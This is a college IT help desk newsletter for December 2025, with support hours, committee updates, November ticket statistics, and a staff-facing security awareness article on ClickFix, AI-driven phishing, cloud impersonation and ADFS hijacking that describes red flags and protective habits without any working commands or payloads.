News from the ITS Help Desk - December 2025

Help Desk Hours and Location

Contact the ITS Help Desk at 1(805)922-6966 extension 3345 or at helpdesk@hancockcollege.edu
The ITS Help Desk is located in the library on the Santa Maria campus, next to the checkout counter.

Scheduled In-Person Support Hours:
Monday – Thursday: 10:00 AM – 2:00 PM

Outside scheduled hours or Friday: Available by appointment

If emergency assistance is needed, please call the ITS Support Extension at 3345.

ITS will have limited availability between 12/22/25 and 1/5/26. We appreciate your understanding and wish you Happy Holidays!

Essential Articles and Ticket Requests

• Updating Personal Information for Password Resets at Allan Hancock College
• How to Connect to ALLAN_HANCOCK_COLLEGE On-Campus Wi-Fi
• Canvas Instructions (hancockcollege.edu)
• Request Form - Something Broke - Report ANY IT Problem (teamdynamix.com)
• Request Form - I Can't Sign In (teamdynamix.com)
• Request Form - Install Something (teamdynamix.com)

Updates from Technology Council and Committees

• Web Services Committee
  • Schedule: Meetings are held bi-monthly, usually on the 1st Thursday, from 9:30-11:00 am.
  • Update: Met and discussed ADA requirements for page banners and other elements for Hancockcollege.edu.
• Educational Technology Advisory Committee (EdTAC)
  • Schedule: Meetings are held bi-monthly, usually on the 1st and 3rd Tuesday, from 2:30-4:00 pm.
  • No Update
• Banner Committee
  • Schedule: Meetings are held monthly, usually on the 2nd Monday, from 9:00 - 10:30 am.
  • Update: 12/19/25 Banner Upgrades were implemented successfully.
• Technology Council
  • Schedule: Meetings are held bi-monthly, usually on the 1st and 3rd Wednesday, from 2:30-4:00 pm.
  • No Update

🔐 2025 Security Concerns in Review

For Faculty and Staff at Allan Hancock College

Cybersecurity threats continue to evolve rapidly. In 2025, attackers are combining old tricks with new technology to make scams more convincing and attacks harder to detect. This article highlights four major areas of concern and offers practical advice on how to stay safe.

1. ClickFix (All Its Varieties)

What it is:
ClickFix is a form of social engineering designed to trick users into believing they are fixing a problem. The attacker presents a convincing message such as “Your account is out of sync,” “Security update required,” or “Click here to resolve this issue.” Instead of fixing anything, the action installs malware or hands control of the device to the attacker.

In 2025, many ClickFix attacks go a step further by asking users to manually run commands — something most faculty and staff would never normally do.

Common ClickFix behaviors now include:

• Instructions to press Windows + R, paste a command, and click Run

• Instructions to open Terminal on macOS and paste a command

• Claims that this step is “required to complete the fix” or “verify your device”

These instructions are a major red flag. Legitimate IT support will not ask you to manually run commands like this.

What to Watch For:

Be especially cautious if you see:

• A message telling you to:

  • “Press Windows + R”

  • “Open Terminal”

  • “Paste this command exactly”

• Claims that the command is “safe,” “temporary,” or “required to restore access”

• Messages that appear urgent or imply consequences if you don’t act immediately

• Screens that imitate Microsoft, Apple, or a security warning page

Important:
Running commands manually bypasses many built-in security protections. Once run, the attacker may gain full access to the system.

How to Avoid ClickFix Attacks:

✔ Do not run commands unless you are working directly with Allan Hancock College ITS
✔ Do not press Windows + R or open Terminal because a website or email told you to
✔ Close the browser tab immediately if you see instructions like this
✔ Contact ITS if you’re unsure — even if you already clicked something
✔ Remember: real updates and fixes happen automatically or through trusted software

Simple Rule to Remember

If a website or email tells you to open Run or Terminal, it is almost certainly a scam.

2. AI-Enhanced and Supported Social Engineering

What it is:
Social engineering tricks people into revealing sensitive information. In 2025, attackers are using artificial intelligence (AI) to write highly convincing emails, texts, or voice messages that mimic writing styles and tone of real colleagues or vendors. AI can also generate deepfake voices or video to impersonate a trusted person.

Examples:

• Emails asking you to “confirm your login details” written in your supervisor’s tone.

• AI-generated voicemail from a fake “IT Helpdesk.”

Red flags to watch for:

• Urgent language (“act now!”) or pressure to bypass normal procedures.

• Requests for credentials, codes, or sharing documents that you didn’t expect.

• Messages with slight but incorrect details (wrong department name, odd phrasing).

Tips to avoid it:
✔ Always verify unusual requests via a second channel (phone call or in person).
✔ Never send passwords, MFA codes, or sensitive data via email or text.
✔ Report suspicious emails to ITS immediately.
✔ Use MFA (multi-factor authentication) everywhere possible.

3. Cloud Provider Impersonation

What it is:
Attackers impersonate cloud providers (like Microsoft, Google, AWS, or cloud services AHC uses) to trick users into giving up access or sensitive information. This might be done with fake support emails, malicious login pages that look legitimate, or impersonating provider staff.

How it works:

• A user gets an “alert from your cloud provider” asking to log in to fix an issue.

• Clicking the link takes them to a fake page that looks real.

• Login credentials are captured by attackers who then access college resources.

Red flags to watch for:

• Emails that appear to come from support but contain strange URLs or unusual formatting.

• Unexpected requests to log in to cloud services outside regular workflows.

• Messages asking you to confirm account details or permissions.

Tips to avoid it:
✔ Before acting on alerts, hover over links — does the actual URL match what it should be?
✔ When in doubt, go to the cloud provider’s site directly (don’t use the link).
✔ Enable MFA on all cloud accounts.
✔ Use strong passwords that are unique per site.

4. ADFS Hijacking

What it is:
ADFS (Active Directory Federation Services) is a single sign-on system that lets you use one set of credentials across many services (like Office 365). Attackers are finding ways to hijack that trust by using legitimate ADFS redirects to send you to fake login pages that steal credentials or bypass multi-factor authentication. 

How it works:

• A link looks like it’s from Microsoft (starting with office.com).

• Because it starts in a trusted domain, traditional filters won’t block it.

• You log in thinking it’s legitimate, but credentials go to the attacker.

Red flags to watch for:

• Links that look legitimate but were reached from a search or ad rather than official communication.

• Login pages outside the usual Microsoft experience.

• Requests for your password/MFA that arrive unexpectedly.

Tips to avoid it:
✔ Type “portal.office.com” (or your familiar login page) directly rather than clicking.
✔ Use MFA — especially phishing-resistant methods like security keys when available.
✔ Alert ITS if you see unusual login screens or redirects.
✔ Don’t trust login pages that came from search ads.

🛡️ General Security Best Practices for 2025

Here are evergreen tips that protect against all of the threats above:

🧠 Stay vigilant:

• Think before you click. If a message feels “off,” even slightly — pause.

• Confirm unusual requests through known channels.

🔐 Strengthen access controls:

• Use unique passwords and strong MFA (avoid SMS codes when possible).

• Change passwords regularly and don’t reuse them across systems.

🖥️ Stay current:

• Keep devices updated. Security patches fix vulnerabilities the attackers exploit.

📣 Report anything suspicious:

• Report suspicious emails, pop-ups, or login requests to Allan Hancock ITS right away via: Information Security Report

November 2025 Ticket Summary

Here’s a brief overview of ITS activity:
Total Tickets (Whole Department)

• August: 713
• September: 589
• October: 593
• November: 431

Location-less Tickets

240 tickets had no location specified.

Lompoc Valley Campus (LVC) Tickets

22 tickets originated from the Lompoc Valley Campus.

Top 5 Forms Used at LVC:

1. Something Broke: 9
2. Service Request: 7
3. Problem Form: 2
4. Classroom/Cart Maintenance Request: 1
5. Install Something: 1

5 Most Common Request Locations:

1. LVC 1: 9
2. LVC 5: 5
3. LVC 2: 4
4. LVC 3: 4

Only 4 unique buildings submitted ticket requests

Santa Maria Valley Campus (SM) Tickets

169 tickets originated from the Santa Maria Valley Campus.

Top 5 Forms Used at SM Campus:

1. Something Broke: 63
2. Install Something: 11
3. Audio/Visual Event Request: 9
4. Service Request: 7
5. Problem Form: 6

5 Most Common Request Locations:

1. Building F: 25
2. Building M: 25
3. Building L: 20
4. Building B: 19
5. Building A: 18

Sources & Acknowledgments

Portions of this article were informed by industry research and analysis from Push Security, a cybersecurity company focused on detecting and preventing modern identity-based attacks, including ClickFix and social-engineering techniques.
Learn more at: Blog | Push Security

Content drafting, synthesis, and audience-focused explanations were assisted by ChatGPT, an AI language model used to help translate complex security topics into clear, faculty- and staff-friendly guidance.